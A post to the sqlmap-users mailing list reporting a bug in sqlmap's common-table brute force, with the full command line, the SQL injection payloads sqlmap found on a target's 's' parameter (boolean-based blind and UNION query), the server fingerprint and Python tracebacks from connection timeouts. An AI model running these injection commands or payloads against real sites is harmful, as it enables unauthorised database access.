[sqlmap-users] BUG table brutforce mysql 4

[<nig...@em...>]

<html><head></head><body bgcolor='#FFFFFF' style='font-size:12px;background-color:#FFFFFF;font-family:Verdana, Arial, sans-serif;'>This Bug is from my laptops sqlmap with python 2.7&nbsp; The other problem is on another PC with still python 2.6 ;)<br/><br/>sqlmap -u &quot;http://website.com/feed.php?s=os&amp;p=48693&quot; --random-agent --retries=6 --level 5 --risk 3 --common-tables -D Database<br/><br/>Place: GET<br/>Parameter: s<br/>&nbsp;&nbsp;&nbsp; Type: boolean-based blind<br/>&nbsp;&nbsp;&nbsp; Title: AND boolean-based blind - WHERE or HAVING clause<br/>&nbsp;&nbsp;&nbsp; Payload: s=os' AND 611=611 AND 'oBcE'='oBcE&amp;p=48693<br/><br/>&nbsp;&nbsp;&nbsp; Type: UNION query<br/>&nbsp;&nbsp;&nbsp; Title: MySQL UNION query (NULL) - 1 to 10 columns<br/>&nbsp;&nbsp;&nbsp; Payload: s=os' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,99,112,106,58),CHAR(108,106,75,100,77,106<br/>,84,75,97,86),CHAR(58,119,106,120,58)), NULL, NULL, NULL# AND 'sOCX'='sOCX&amp;p=48693<br/>---<br/><br/>[04:52:32] [INFO] manual usage of GET payloads requires url encoding<br/>[04:52:32] [INFO] the back-end DBMS is MySQL<br/><br/>web application technology: PHP 4.4.0, Apache 1.3.33<br/>back-end DBMS: MySQL 4<br/>[04:52:32] [INFO] checking table existence using items from 'C:\pentest\p\sqlmap.0.9-1\txt\comm<br/>on-tables.txt'<br/>[04:52:32] [INFO] adding words used on web page to the check list<br/>please enter number of threads? [Enter for 1 (current)] 3<br/>[04:52:40] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fix<br/>ing problems with some collation issues)<br/>[04:53:23] [INFO] tried 74/3452 items (2%)[04:53:24] [CRITICAL] connection timed out to the target url or prox<br/>y, sqlmap is going to retry the request<br/>[04:53:24] [WARNING] if the problem persists please try to lower the number of used threads (--threads)<br/>[04:53:38] [INFO] tried 88/3452 items (3%)<br/>[04:53:39] [WARNING] user aborted during common table existence check. sqlmap will display some tables only<br/>Exception in thread 1:<br/>Traceback (most recent call last):<br/>&nbsp; File &quot;C:\Python27\lib\threading.py&quot;, line 532, in __bootstrap_inner<br/>&nbsp;&nbsp;&nbsp; self.run()<br/>&nbsp; File &quot;C:\Python27\lib\threading.py&quot;, line 485, in run<br/>&nbsp;&nbsp;&nbsp; self.__target(*self.__args, **self.__kwargs)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py&quot;, line 76, in tableExistsThread<br/>&nbsp;&nbsp;&nbsp; result = inject.checkBooleanExpression(&quot;%s&quot; % safeStringFormat(&quot;EXISTS(SELECT %d FROM %s)&quot;, (randomInt(1),<br/>&nbsp;fullTableName)))<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py&quot;, line 519, in checkBooleanExpression<br/>&nbsp;&nbsp;&nbsp; value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNon<br/>e=expectingNone)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py&quot;, line 432, in getValue<br/>&nbsp;&nbsp;&nbsp; value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py&quot;, line 386, in __goInband<br/>&nbsp;&nbsp;&nbsp; output = unionUse(expression, unpack=unpack, dump=dump)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py&quot;, line 354, in unionUse<br/>&nbsp;&nbsp;&nbsp; value = __oneShotUnionUse(expression, unpack)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py&quot;, line 72, in __oneShotUni<br/>onUse<br/>&nbsp;&nbsp;&nbsp; page, headers = Request.queryPage(payload, content=True, raise404=False)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py&quot;, line 585, in queryPage<br/>&nbsp;&nbsp;&nbsp; page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent<br/>=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCo<br/>mpare)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py&quot;, line 439, in getPage<br/>&nbsp;&nbsp;&nbsp; raise sqlmapConnectionException, warnMsg<br/>sqlmapConnectionException: unable to connect to the target url or proxy<br/><br/>Exception in thread 2:<br/>Traceback (most recent call last):<br/>&nbsp; File &quot;C:\Python27\lib\threading.py&quot;, line 532, in __bootstrap_inner<br/>&nbsp;&nbsp;&nbsp; self.run()<br/>&nbsp; File &quot;C:\Python27\lib\threading.py&quot;, line 485, in run<br/>&nbsp;&nbsp;&nbsp; self.__target(*self.__args, **self.__kwargs)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py&quot;, line 76, in tableExistsThread<br/>&nbsp;&nbsp;&nbsp; result = inject.checkBooleanExpression(&quot;%s&quot; % safeStringFormat(&quot;EXISTS(SELECT %d FROM %s)&quot;, (randomInt(1),<br/>&nbsp;fullTableName)))<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py&quot;, line 519, in checkBooleanExpression<br/>&nbsp;&nbsp;&nbsp; value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNon<br/>e=expectingNone)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py&quot;, line 432, in getValue<br/>&nbsp;&nbsp;&nbsp; value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py&quot;, line 386, in __goInband<br/>&nbsp;&nbsp;&nbsp; output = unionUse(expression, unpack=unpack, dump=dump)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py&quot;, line 354, in unionUse<br/>&nbsp;&nbsp;&nbsp; value = __oneShotUnionUse(expression, unpack)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py&quot;, line 72, in __oneShotUni<br/>onUse<br/>&nbsp;&nbsp;&nbsp; page, headers = Request.queryPage(payload, content=True, raise404=False)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py&quot;, line 585, in queryPage<br/>&nbsp;&nbsp;&nbsp; page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent<br/>=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCo<br/>mpare)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py&quot;, line 433, in getPage<br/>&nbsp;&nbsp;&nbsp; return Connect.__getPageProxy(**kwargs)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py&quot;, line 73, in __getPageProxy<br/>&nbsp;&nbsp;&nbsp; return Connect.getPage(**kwargs)<br/>&nbsp; File &quot;C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py&quot;, line 439, in getPage<br/>&nbsp;&nbsp;&nbsp; raise sqlmapConnectionException, warnMsg<br/>sqlmapConnectionException: connection timed out to the target url or proxy<br/><br/><br/>[04:53:55] [WARNING] no table(s) found<br/>tables:&nbsp;&nbsp;&nbsp; '{}'<br/><br/>[04:53:55] [INFO] Fetched data logged to text files under 'C:\pentest\p\sqlmap.0.9-1\output\<br/><br/>[*] shutting down at: 04:53:55<br/></body></html>